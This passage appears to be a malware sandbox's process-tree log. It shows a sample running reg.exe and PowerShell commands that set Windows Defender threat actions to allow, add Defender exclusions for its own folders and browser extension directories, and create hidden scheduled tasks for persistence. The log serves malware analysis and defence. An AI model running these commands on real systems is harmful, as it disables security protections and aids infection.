/t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                      2⤵
                                                      • Drops file in System32 directory
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:4700
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                        3⤵
                                                          PID:3436
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                          3⤵
                                                            PID:1428
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:2344
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:3556
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                  4⤵
                                                                    PID:4872
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                  3⤵
                                                                    PID:4872
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                    3⤵
                                                                      PID:1740
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                      3⤵
                                                                        PID:3356
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                        3⤵
                                                                          PID:5040
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                          3⤵
                                                                            PID:1792
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                            3⤵
                                                                              PID:4544
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                              3⤵
                                                                                PID:2996
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                3⤵
                                                                                  PID:5004
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                  3⤵
                                                                                    PID:1500
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                    3⤵
                                                                                      PID:4156
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                      3⤵
                                                                                        PID:4452
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                        3⤵
                                                                                          PID:4712
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                          3⤵
                                                                                            PID:2472
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                            3⤵
                                                                                              PID:4692
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                              3⤵
                                                                                                PID:4852
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                3⤵
                                                                                                  PID:720
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                  3⤵
                                                                                                    PID:3948
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                    3⤵
                                                                                                      PID:1408
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                      3⤵
                                                                                                        PID:2496
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                        3⤵
                                                                                                          PID:1860
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                          3⤵
                                                                                                            PID:1176
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                            3⤵
                                                                                                              PID:1012
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                              3⤵
                                                                                                                PID:4136
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:3556
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DufnooWHNFUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DufnooWHNFUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IAvstfEYU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IAvstfEYU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WNdNVmbTRKpEC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WNdNVmbTRKpEC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gNEkwGGiCnIU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gNEkwGGiCnIU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sdTGWCKIydsYsNrSARR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sdTGWCKIydsYsNrSARR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cvDkMpEVJyabfeVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\cvDkMpEVJyabfeVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fgekRaJKKiJdEvwV\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fgekRaJKKiJdEvwV\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                2⤵
                                                                                                                • Drops file in System32 directory
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:3508
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNdNVmbTRKpEC" /t REG_DWORD /d 0 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:3456
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cvDkMpEVJyabfeVB /t REG_DWORD /d 0 /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:3452
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fgekRaJKKiJdEvwV /t REG_DWORD /d 0 /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:2412
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fgekRaJKKiJdEvwV /t REG_DWORD /d 0 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:2548
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw /t REG_DWORD /d 0 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:2624
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw /t REG_DWORD /d 0 /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:2024
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                              3⤵
                                                                                                                                PID:3512
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                3⤵
                                                                                                                                  PID:1348
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:2936
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                    3⤵
                                                                                                                                      PID:4468
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\cvDkMpEVJyabfeVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:4408
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:216
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdTGWCKIydsYsNrSARR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:2788
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gNEkwGGiCnIU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:1680
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gNEkwGGiCnIU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:3572
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WNdNVmbTRKpEC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:4144
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAvstfEYU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1928
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IAvstfEYU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:1328
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:4356
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4952
                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            4⤵
                                                                                                                                                              PID:3572
                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          schtasks /run /I /tn "gNSudLbIG"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4480
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /CREATE /TN "gNSudLbIG" /SC once /ST 09:03:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                            2⤵
                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                            PID:2740
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /DELETE /F /TN "gNSudLbIG"
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1720
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /CREATE /TN "HddpujWaDpLIbkLdt" /SC once /ST 14:41:18 /RU "SYSTEM" /TR "\"C:\Windows\Temp\fgekRaJKKiJdEvwV\fcCwMaVthMrKJoX\TPkxaYo.exe\" gT /VEsite_idtyf 385118 /S" /V1 /F
                                                                                                                                                              2⤵
                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                              PID:1460
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /run /I /tn "HddpujWaDpLIbkLdt"
                                                                                                                                                              2⤵
                                                                                                                                                                PID:4964
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                              1⤵
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:1368
                                                                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:5040
                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:3512
                                                                                                                                                                • C:\Windows\system32\gpscript.exe
                                                                                                                                                                  gpscript.exe /RefreshSystemParam
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:4372
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DufnooWHNFUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:3192
                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:4144
                                                                                                                                                                      • C:\Windows\Temp\fgekRaJKKiJdEvwV\fcCwMaVthMrKJoX\TPkxaYo.exe
                                                                                                                                                                        C:\Windows\Temp\fgekRaJKKiJdEvwV\fcCwMaVthMrKJoX\TPkxaYo.exe gT /VEsite_idtyf 385118 /S
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Drops Chrome extension
                                                                                                                                                                        • Drops desktop.ini file(s)
                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                        PID:4712
                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                          schtasks /DELETE /F /TN "bmfUAJAHieefCXsdaD"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:3244
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:3308
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:1732
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:2200
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:1128
                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\IAvstfEYU\HPPXrz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "gcsaRhxvmhmmEZS" /V1 /F
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                  PID:2812
